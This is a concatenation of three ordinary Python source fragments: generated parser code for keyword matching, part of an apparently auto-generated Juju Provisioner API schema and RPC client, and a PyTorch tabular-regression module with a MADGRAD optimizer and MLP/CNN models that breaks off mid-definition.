chunk2, max2 = None, self._offset + 5
if max2 <= self._input_size:
chunk2 = self._input[self._offset:max2]
if chunk2 == 'until':
address3 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address3 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'until\'')
if address3 is not FAILURE:
elements1.append(address3)
address4 = FAILURE
index5 = self._offset
chunk3, max3 = None, self._offset + 1
if max3 <= self._input_size:
chunk3 = self._input[self._offset:max3]
if chunk3 is not None and Grammar.REGEX_6.search(chunk3):
address4 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address4 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index5
if address4 is FAILURE:
address4 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address4 = FAILURE
if address4 is not FAILURE:
elements1.append(address4)
else:
elements1 = None
self._offset = index4
else:
elements1 = None
self._offset = index4
if elements1 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index4:self._offset], index4, elements1)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index6, elements2 = self._offset, []
address5 = FAILURE
chunk4, max4 = None, self._offset + 2
if max4 <= self._input_size:
chunk4 = self._input[self._offset:max4]
if chunk4 == 'do':
address5 = TreeNode(self._input[self._offset:self._offset + 2], self._offset, [])
self._offset = self._offset + 2
else:
address5 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'do\'')
if address5 is not FAILURE:
elements2.append(address5)
address6 = FAILURE
index7 = self._offset
chunk5, max5 = None, self._offset + 1
if max5 <= self._input_size:
chunk5 = self._input[self._offset:max5]
if chunk5 is not None and Grammar.REGEX_7.search(chunk5):
address6 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address6 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index7
if address6 is FAILURE:
address6 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address6 = FAILURE
if address6 is not FAILURE:
elements2.append(address6)
else:
elements2 = None
self._offset = index6
else:
elements2 = None
self._offset = index6
if elements2 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index6:self._offset], index6, elements2)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index8, elements3 = self._offset, []
address7 = FAILURE
chunk6, max6 = None, self._offset + 6
if max6 <= self._input_size:
chunk6 = self._input[self._offset:max6]
if chunk6 == 'except':
address7 = TreeNode(self._input[self._offset:self._offset + 6], self._offset, [])
self._offset = self._offset + 6
else:
address7 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'except\'')
if address7 is not FAILURE:
elements3.append(address7)
address8 = FAILURE
index9 = self._offset
chunk7, max7 = None, self._offset + 1
if max7 <= self._input_size:
chunk7 = self._input[self._offset:max7]
if chunk7 is not None and Grammar.REGEX_8.search(chunk7):
address8 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address8 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index9
if address8 is FAILURE:
address8 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address8 = FAILURE
if address8 is not FAILURE:
elements3.append(address8)
else:
elements3 = None
self._offset = index8
else:
elements3 = None
self._offset = index8
if elements3 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index8:self._offset], index8, elements3)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index10, elements4 = self._offset, []
address9 = FAILURE
chunk8, max8 = None, self._offset + 3
if max8 <= self._input_size:
chunk8 = self._input[self._offset:max8]
if chunk8 == 'for':
address9 = TreeNode(self._input[self._offset:self._offset + 3], self._offset, [])
self._offset = self._offset + 3
else:
address9 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'for\'')
if address9 is not FAILURE:
elements4.append(address9)
address10 = FAILURE
index11 = self._offset
chunk9, max9 = None, self._offset + 1
if max9 <= self._input_size:
chunk9 = self._input[self._offset:max9]
if chunk9 is not None and Grammar.REGEX_9.search(chunk9):
address10 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address10 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('[0-9a-zA-Z_]')
self._offset = index11
if address10 is FAILURE:
address10 = TreeNode(self._input[self._offset:self._offset], self._offset, [])
self._offset = self._offset
else:
address10 = FAILURE
if address10 is not FAILURE:
elements4.append(address10)
else:
elements4 = None
self._offset = index10
else:
elements4 = None
self._offset = index10
if elements4 is None:
address0 = FAILURE
else:
address0 = TreeNode(self._input[index10:self._offset], index10, elements4)
self._offset = self._offset
if address0 is FAILURE:
self._offset = index1
index12, elements5 = self._offset, []
address11 = FAILURE
chunk10, max10 = None, self._offset + 5
if max10 <= self._input_size:
chunk10 = self._input[self._offset:max10]
if chunk10 == 'every':
address11 = TreeNode(self._input[self._offset:self._offset + 5], self._offset, [])
self._offset = self._offset + 5
else:
address11 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if self._offset == self._failure:
self._expected.append('\'every\'')
if address11 is not FAILURE:
elements5.append(address11)
address12 = FAILURE
index13 = self._offset
chunk11, max11 = None, self._offset + 1
if max11 <= self._input_size:
chunk11 = self._input[self._offset:max11]
if chunk11 is not None and Grammar.REGEX_10.search(chunk11):
address12 = TreeNode(self._input[self._offset:self._offset + 1], self._offset, [])
self._offset = self._offset + 1
else:
address12 = FAILURE
if self._offset > self._failure:
self._failure = self._offset
self._expected = []
if | |
{'type': 'string'}},
'type': 'object'},
'image-metadata': {'items': {'$ref': '#/definitions/CloudImageMetadata'},
'type': 'array'},
'jobs': {'items': {'type': 'string'},
'type': 'array'},
'placement': {'type': 'string'},
'series': {'type': 'string'},
'subnets-to-zones': {'patternProperties': {'.*': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'tags': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'volume-attachments': {'items': {'$ref': '#/definitions/VolumeAttachmentParams'},
'type': 'array'},
'volumes': {'items': {'$ref': '#/definitions/VolumeParams'},
'type': 'array'}},
'required': ['constraints',
'series',
'placement',
'jobs'],
'type': 'object'},
'ProvisioningInfoResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'$ref': '#/definitions/ProvisioningInfo'}},
'required': ['result'],
'type': 'object'},
'ProvisioningInfoResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/ProvisioningInfoResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'SetMachineNetworkConfig': {'additionalProperties': False,
'properties': {'config': {'items': {'$ref': '#/definitions/NetworkConfig'},
'type': 'array'},
'tag': {'type': 'string'}},
'required': ['tag', 'config'],
'type': 'object'},
'SetProfileArg': {'additionalProperties': False,
'properties': {'entity': {'$ref': '#/definitions/Entity'},
'profiles': {'items': {'type': 'string'},
'type': 'array'}},
'required': ['entity', 'profiles'],
'type': 'object'},
'SetProfileArgs': {'additionalProperties': False,
'properties': {'args': {'items': {'$ref': '#/definitions/SetProfileArg'},
'type': 'array'}},
'required': ['args'],
'type': 'object'},
'SetProfileUpgradeCompleteArg': {'additionalProperties': False,
'properties': {'entity': {'$ref': '#/definitions/Entity'},
'message': {'type': 'string'}},
'required': ['entity',
'message'],
'type': 'object'},
'SetProfileUpgradeCompleteArgs': {'additionalProperties': False,
'properties': {'args': {'items': {'$ref': '#/definitions/SetProfileUpgradeCompleteArg'},
'type': 'array'}},
'required': ['args'],
'type': 'object'},
'SetStatus': {'additionalProperties': False,
'properties': {'entities': {'items': {'$ref': '#/definitions/EntityStatusArgs'},
'type': 'array'}},
'required': ['entities'],
'type': 'object'},
'Settings': {'additionalProperties': False,
'properties': {'AutoNoProxy': {'type': 'string'},
'Ftp': {'type': 'string'},
'Http': {'type': 'string'},
'Https': {'type': 'string'},
'NoProxy': {'type': 'string'}},
'required': ['Http',
'Https',
'Ftp',
'NoProxy',
'AutoNoProxy'],
'type': 'object'},
'StatusResult': {'additionalProperties': False,
'properties': {'data': {'patternProperties': {'.*': {'additionalProperties': True,
'type': 'object'}},
'type': 'object'},
'error': {'$ref': '#/definitions/Error'},
'id': {'type': 'string'},
'info': {'type': 'string'},
'life': {'type': 'string'},
'since': {'format': 'date-time',
'type': 'string'},
'status': {'type': 'string'}},
'required': ['id',
'life',
'status',
'info',
'data',
'since'],
'type': 'object'},
'StatusResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StatusResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'type': 'string'}},
'required': ['result'],
'type': 'object'},
'StringResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringsResult': {'additionalProperties': False,
'properties': {'error': {'$ref': '#/definitions/Error'},
'result': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'StringsResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringsResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'StringsWatchResult': {'additionalProperties': False,
'properties': {'changes': {'items': {'type': 'string'},
'type': 'array'},
'error': {'$ref': '#/definitions/Error'},
'watcher-id': {'type': 'string'}},
'required': ['watcher-id'],
'type': 'object'},
'StringsWatchResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/StringsWatchResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'Tools': {'additionalProperties': False,
'properties': {'sha256': {'type': 'string'},
'size': {'type': 'integer'},
'url': {'type': 'string'},
'version': {'$ref': '#/definitions/Binary'}},
'required': ['version', 'url', 'size'],
'type': 'object'},
'ToolsResult': {'additionalProperties': False,
'properties': {'disable-ssl-hostname-verification': {'type': 'boolean'},
'error': {'$ref': '#/definitions/Error'},
'tools': {'items': {'$ref': '#/definitions/Tools'},
'type': 'array'}},
'required': ['tools',
'disable-ssl-hostname-verification'],
'type': 'object'},
'ToolsResults': {'additionalProperties': False,
'properties': {'results': {'items': {'$ref': '#/definitions/ToolsResult'},
'type': 'array'}},
'required': ['results'],
'type': 'object'},
'UpdateBehavior': {'additionalProperties': False,
'properties': {'enable-os-refresh-update': {'type': 'boolean'},
'enable-os-upgrade': {'type': 'boolean'}},
'required': ['enable-os-refresh-update',
'enable-os-upgrade'],
'type': 'object'},
'Value': {'additionalProperties': False,
'properties': {'arch': {'type': 'string'},
'container': {'type': 'string'},
'cores': {'type': 'integer'},
'cpu-power': {'type': 'integer'},
'instance-type': {'type': 'string'},
'mem': {'type': 'integer'},
'root-disk': {'type': 'integer'},
'spaces': {'items': {'type': 'string'},
'type': 'array'},
'tags': {'items': {'type': 'string'},
'type': 'array'},
'virt-type': {'type': 'string'},
'zones': {'items': {'type': 'string'},
'type': 'array'}},
'type': 'object'},
'Volume': {'additionalProperties': False,
'properties': {'info': {'$ref': '#/definitions/VolumeInfo'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag', 'info'],
'type': 'object'},
'VolumeAttachmentInfo': {'additionalProperties': False,
'properties': {'bus-address': {'type': 'string'},
'device-link': {'type': 'string'},
'device-name': {'type': 'string'},
'plan-info': {'$ref': '#/definitions/VolumeAttachmentPlanInfo'},
'read-only': {'type': 'boolean'}},
'type': 'object'},
'VolumeAttachmentParams': {'additionalProperties': False,
'properties': {'instance-id': {'type': 'string'},
'machine-tag': {'type': 'string'},
'provider': {'type': 'string'},
'read-only': {'type': 'boolean'},
'volume-id': {'type': 'string'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag',
'machine-tag',
'provider'],
'type': 'object'},
'VolumeAttachmentPlanInfo': {'additionalProperties': False,
'properties': {'device-attributes': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'device-type': {'type': 'string'}},
'type': 'object'},
'VolumeInfo': {'additionalProperties': False,
'properties': {'hardware-id': {'type': 'string'},
'persistent': {'type': 'boolean'},
'pool': {'type': 'string'},
'size': {'type': 'integer'},
'volume-id': {'type': 'string'},
'wwn': {'type': 'string'}},
'required': ['volume-id', 'size', 'persistent'],
'type': 'object'},
'VolumeParams': {'additionalProperties': False,
'properties': {'attachment': {'$ref': '#/definitions/VolumeAttachmentParams'},
'attributes': {'patternProperties': {'.*': {'additionalProperties': True,
'type': 'object'}},
'type': 'object'},
'provider': {'type': 'string'},
'size': {'type': 'integer'},
'tags': {'patternProperties': {'.*': {'type': 'string'}},
'type': 'object'},
'volume-tag': {'type': 'string'}},
'required': ['volume-tag',
'size',
'provider'],
'type': 'object'},
'WatchContainer': {'additionalProperties': False,
'properties': {'container-type': {'type': 'string'},
'machine-tag': {'type': 'string'}},
'required': ['machine-tag',
'container-type'],
'type': 'object'},
'WatchContainers': {'additionalProperties': False,
'properties': {'params': {'items': {'$ref': '#/definitions/WatchContainer'},
'type': 'array'}},
'required': ['params'],
'type': 'object'}},
'properties': {'APIAddresses': {'properties': {'Result': {'$ref': '#/definitions/StringsResult'}},
'type': 'object'},
'APIHostPorts': {'properties': {'Result': {'$ref': '#/definitions/APIHostPortsResult'}},
'type': 'object'},
'AvailabilityZone': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'CACert': {'properties': {'Result': {'$ref': '#/definitions/BytesResult'}},
'type': 'object'},
'CharmProfileChangeInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ProfileChangeResults'}},
'type': 'object'},
'Constraints': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ConstraintsResults'}},
'type': 'object'},
'ContainerConfig': {'properties': {'Result': {'$ref': '#/definitions/ContainerConfig'}},
'type': 'object'},
'ContainerManagerConfig': {'properties': {'Params': {'$ref': '#/definitions/ContainerManagerConfigParams'},
'Result': {'$ref': '#/definitions/ContainerManagerConfig'}},
'type': 'object'},
'ControllerAPIInfoForModels': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ControllerAPIInfoResults'}},
'type': 'object'},
'ControllerConfig': {'properties': {'Result': {'$ref': '#/definitions/ControllerConfigResult'}},
'type': 'object'},
'DistributionGroup': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/DistributionGroupResults'}},
'type': 'object'},
'DistributionGroupByMachineId': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringsResults'}},
'type': 'object'},
'EnsureDead': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'FindTools': {'properties': {'Params': {'$ref': '#/definitions/FindToolsParams'},
'Result': {'$ref': '#/definitions/FindToolsResult'}},
'type': 'object'},
'GetContainerInterfaceInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/MachineNetworkConfigResults'}},
'type': 'object'},
'GetContainerProfileInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ContainerProfileResults'}},
'type': 'object'},
'HostChangesForContainers': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/HostNetworkChangeResults'}},
'type': 'object'},
'InstanceId': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'InstanceStatus': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'KeepInstance': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/BoolResults'}},
'type': 'object'},
'Life': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/LifeResults'}},
'type': 'object'},
'MachinesWithTransientErrors': {'properties': {'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'MarkMachinesForRemoval': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'ModelConfig': {'properties': {'Result': {'$ref': '#/definitions/ModelConfigResult'}},
'type': 'object'},
'ModelUUID': {'properties': {'Result': {'$ref': '#/definitions/StringResult'}},
'type': 'object'},
'PrepareContainerInterfaceInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/MachineNetworkConfigResults'}},
'type': 'object'},
'ProvisioningInfo': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ProvisioningInfoResults'}},
'type': 'object'},
'ReleaseContainerAddresses': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'Remove': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'RemoveUpgradeCharmProfileData': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'Series': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StringResults'}},
'type': 'object'},
'SetCharmProfiles': {'properties': {'Params': {'$ref': '#/definitions/SetProfileArgs'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetHostMachineNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/SetMachineNetworkConfig'}},
'type': 'object'},
'SetInstanceInfo': {'properties': {'Params': {'$ref': '#/definitions/InstancesInfo'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetInstanceStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetObservedNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/SetMachineNetworkConfig'}},
'type': 'object'},
'SetPasswords': {'properties': {'Params': {'$ref': '#/definitions/EntityPasswords'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetProviderNetworkConfig': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetSupportedContainers': {'properties': {'Params': {'$ref': '#/definitions/MachineContainersParams'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'SetUpgradeCharmProfileComplete': {'properties': {'Params': {'$ref': '#/definitions/SetProfileUpgradeCompleteArgs'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'StateAddresses': {'properties': {'Result': {'$ref': '#/definitions/StringsResult'}},
'type': 'object'},
'Status': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/StatusResults'}},
'type': 'object'},
'Tools': {'properties': {'Params': {'$ref': '#/definitions/Entities'},
'Result': {'$ref': '#/definitions/ToolsResults'}},
'type': 'object'},
'UpdateStatus': {'properties': {'Params': {'$ref': '#/definitions/SetStatus'},
'Result': {'$ref': '#/definitions/ErrorResults'}},
'type': 'object'},
'WatchAPIHostPorts': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchAllContainers': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchContainers': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchContainersCharmProfiles': {'properties': {'Params': {'$ref': '#/definitions/WatchContainers'},
'Result': {'$ref': '#/definitions/StringsWatchResults'}},
'type': 'object'},
'WatchForModelConfigChanges': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchMachineErrorRetry': {'properties': {'Result': {'$ref': '#/definitions/NotifyWatchResult'}},
'type': 'object'},
'WatchModelMachines': {'properties': {'Result': {'$ref': '#/definitions/StringsWatchResult'}},
'type': 'object'},
'WatchModelMachinesCharmProfiles': {'properties': {'Result': {'$ref': '#/definitions/StringsWatchResult'}},
'type': 'object'}},
'type': 'object'}
@ReturnMapping(StringsResult)
async def APIAddresses(self):
'''
Returns -> typing.Union[_ForwardRef('Error'), typing.Sequence[str]]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='APIAddresses',
version=7,
params=_params)
reply = await self.rpc(msg)
return reply
@ReturnMapping(APIHostPortsResult)
async def APIHostPorts(self):
'''
Returns -> typing.Sequence[~HostPort]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='APIHostPorts',
version=7,
params=_params)
reply = await self.rpc(msg)
return reply
@ReturnMapping(StringResults)
async def AvailabilityZone(self, entities=None):
'''
entities : typing.Sequence[~Entity]
Returns -> typing.Sequence[~StringResult]
'''
if entities is not None and not isinstance(entities, (bytes, str, list)):
raise Exception("Expected entities to be a Sequence, received: {}".format(type(entities)))
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='AvailabilityZone',
version=7,
params=_params)
_params['entities'] = entities
reply = await self.rpc(msg)
return reply
@ReturnMapping(BytesResult)
async def CACert(self):
'''
Returns -> typing.Sequence[int]
'''
# map input types to rpc msg
_params = dict()
msg = dict(type='Provisioner',
request='CACert',
version=7,
params=_params)
| |
<gh_stars>1-10
import math
import os
import pickle
import random
from typing import Any, Callable, List, Optional, Union, TYPE_CHECKING
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from sklearn.metrics import mean_absolute_error
from sklearn.preprocessing import StandardScaler, QuantileTransformer
from torch.optim.optimizer import Optimizer
from torch.utils.data import Dataset, DataLoader
from tqdm import tqdm
from src.config import NNConfig
from src.constants import CATEGORICAL_COLS
from src.util import TimeSeriesSplit
if TYPE_CHECKING:
from torch.optim.optimizer import _params_t
else:
_params_t = Any
def seed_everything(seed=42):
    """Seed every relevant RNG (python, numpy, torch CPU and CUDA).

    Also pins ``PYTHONHASHSEED`` and forces deterministic cuDNN kernels so
    repeated runs produce identical results.
    """
    random.seed(seed)
    os.environ['PYTHONHASHSEED'] = str(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed(seed)
    # Seed every CUDA device, not just the current one (no-op without CUDA).
    torch.cuda.manual_seed_all(seed)
    torch.backends.cudnn.deterministic = True
class MADGRAD(Optimizer):
def __init__(
self, params: _params_t, lr: float = 1e-2, momentum: float = 0.9, weight_decay: float = 0,
eps: float = 1e-6,
):
if momentum < 0 or momentum >= 1:
raise ValueError(f"Momentum {momentum} must be in the range [0,1]")
if lr <= 0:
raise ValueError(f"Learning rate {lr} must be positive")
if weight_decay < 0:
raise ValueError(f"Weight decay {weight_decay} must be non-negative")
if eps < 0:
raise ValueError(f"Eps must be non-negative")
defaults = dict(lr=lr, eps=eps, momentum=momentum, weight_decay=weight_decay)
super().__init__(params, defaults)
@property
def supports_memory_efficient_fp16(self) -> bool:
return False
@property
def supports_flat_params(self) -> bool:
return True
def step(self, closure: Optional[Callable[[], float]] = None) -> Optional[float]:
loss = None
if closure is not None:
loss = closure()
if 'k' not in self.state:
self.state['k'] = torch.tensor([0], dtype=torch.long)
k = self.state['k'].item()
for group in self.param_groups:
eps = group["eps"]
lr = group["lr"] + eps
decay = group["weight_decay"]
momentum = group["momentum"]
ck = 1 - momentum
lamb = lr * math.pow(k + 1, 0.5)
for p in group["params"]:
if p.grad is None:
continue
grad = p.grad.data
state = self.state[p]
if "grad_sum_sq" not in state:
state["grad_sum_sq"] = torch.zeros_like(p.data).detach()
state["s"] = torch.zeros_like(p.data).detach()
if momentum != 0:
state["x0"] = torch.clone(p.data).detach()
if momentum != 0.0 and grad.is_sparse:
raise RuntimeError("momentum != 0 is not compatible with sparse gradients")
grad_sum_sq = state["grad_sum_sq"]
s = state["s"]
# Apply weight decay
if decay != 0:
if grad.is_sparse:
raise RuntimeError("weight_decay option is not compatible with sparse gradients")
grad.add_(p.data, alpha=decay)
if grad.is_sparse:
grad = grad.coalesce()
grad_val = grad._values()
p_masked = p.sparse_mask(grad)
grad_sum_sq_masked = grad_sum_sq.sparse_mask(grad)
s_masked = s.sparse_mask(grad)
# Compute x_0 from other known quantities
rms_masked_vals = grad_sum_sq_masked._values().pow(1 / 3).add_(eps)
x0_masked_vals = p_masked._values().addcdiv(s_masked._values(), rms_masked_vals, value=1)
# Dense + sparse op
grad_sq = grad * grad
grad_sum_sq.add_(grad_sq, alpha=lamb)
grad_sum_sq_masked.add_(grad_sq, alpha=lamb)
rms_masked_vals = grad_sum_sq_masked._values().pow_(1 / 3).add_(eps)
s.add_(grad, alpha=lamb)
s_masked._values().add_(grad_val, alpha=lamb)
# update masked copy of p
p_kp1_masked_vals = x0_masked_vals.addcdiv(s_masked._values(), rms_masked_vals, value=-1)
# Copy updated masked p to dense p using an add operation
p_masked._values().add_(p_kp1_masked_vals, alpha=-1)
p.data.add_(p_masked, alpha=-1)
else:
if momentum == 0:
# Compute x_0 from other known quantities
rms = grad_sum_sq.pow(1 / 3).add_(eps)
x0 = p.data.addcdiv(s, rms, value=1)
else:
x0 = state["x0"]
# Accumulate second moments
grad_sum_sq.addcmul_(grad, grad, value=lamb)
rms = grad_sum_sq.pow(1 / 3).add_(eps)
# Update s
s.data.add_(grad, alpha=lamb)
# Step
if momentum == 0:
p.data.copy_(x0.addcdiv(s, rms, value=-1))
else:
z = x0.addcdiv(s, rms, value=-1)
# p is a moving average of z
p.data.mul_(1 - ck).add_(z, alpha=ck)
self.state['k'] += 1
return loss
class AverageMeter:
    """Computes and stores the average and current value.

    ``val`` is the most recent value, ``avg`` the running (weighted) mean,
    ``sum`` the weighted total, ``count`` the total weight.
    """

    def __init__(self):
        # Fix: the old code initialised every field and then immediately
        # re-initialised them via reset(); delegating once is enough.
        self.reset()

    def reset(self):
        self.val = 0
        self.avg = 0
        self.sum = 0
        self.count = 0

    def update(self, val, n=1):
        """Record ``val`` observed ``n`` times (e.g. a per-batch mean)."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count
class TabularDataset(Dataset):
    """Dataset over pre-split numeric / categorical arrays.

    Yields ``(x_num, x_cat)`` tuples when no labels are given (inference),
    otherwise ``(x_num, x_cat, y)``.
    """

    def __init__(self, x_num: np.ndarray, x_cat: np.ndarray, y: Optional[np.ndarray]):
        super().__init__()
        self.x_num = x_num
        self.x_cat = x_cat
        self.y = y

    def __len__(self):
        return len(self.x_num)

    def __getitem__(self, idx):
        features = (self.x_num[idx], torch.LongTensor(self.x_cat[idx]))
        if self.y is None:
            return features
        return features + (self.y[idx],)
class MLP(nn.Module):
    """Two-hidden-layer MLP over numeric features + categorical embeddings.

    Outputs 4 regression targets, clamped into [0, 100].
    """

    def __init__(self,
                 src_num_dim: int,
                 n_categories: List[int],
                 dropout: float = 0.0,
                 hidden: int = 50,
                 emb_dim: int = 10,
                 dropout_cat: float = 0.2,
                 bn: bool = False):
        super().__init__()
        self.embs = nn.ModuleList([
            nn.Embedding(x, emb_dim) for x in n_categories])
        self.cat_dim = emb_dim * len(n_categories)
        self.dropout_cat = nn.Dropout(dropout_cat)
        # Build the trunk layer-by-layer; module order matches the original
        # (Linear, Dropout, [BatchNorm], ReLU) x 2 followed by the head.
        layers = []
        in_dim = src_num_dim + self.cat_dim
        for _ in range(2):
            layers.append(nn.Linear(in_dim, hidden))
            layers.append(nn.Dropout(dropout))
            if bn:
                layers.append(nn.BatchNorm1d(hidden))
            layers.append(nn.ReLU())
            in_dim = hidden
        layers.append(nn.Linear(in_dim, 4))
        self.sequence = nn.Sequential(*layers)

    def forward(self, x_num, x_cat):
        """x_num: (batch, src_num_dim) floats; x_cat: (batch, n_cat) ids."""
        cat_parts = [emb(x_cat[:, i]) for i, emb in enumerate(self.embs)]
        x_cat_emb = self.dropout_cat(torch.cat(cat_parts, 1))
        out = self.sequence(torch.cat([x_num, x_cat_emb], 1))
        return out.clamp(0, 100)
class CNN(nn.Module):
    """1-D CNN over tabular features (MoA-competition-style architecture).

    Numeric features are concatenated with categorical embeddings, expanded
    to ``hidden_size`` activations, reshaped into ``channel_1`` pseudo
    channels and run through 1-D convolutions.  ``hidden_size`` must be
    divisible by ``channel_1`` (and the quotient by 4) for the reshape and
    the final linear layer to line up.  Output is 4 regression targets.
    """

    def __init__(self,
                 num_features: int,
                 hidden_size: int,
                 n_categories: List[int],
                 emb_dim: int = 10,
                 dropout_cat: float = 0.2,
                 channel_1: int = 256,
                 channel_2: int = 512,
                 channel_3: int = 512,
                 dropout_top: float = 0.1,
                 dropout_mid: float = 0.3,
                 dropout_bottom: float = 0.2,
                 weight_norm: bool = True,
                 two_stage: bool = True,
                 celu: bool = True,
                 kernel1: int = 5):
        super().__init__()
        num_targets = 4
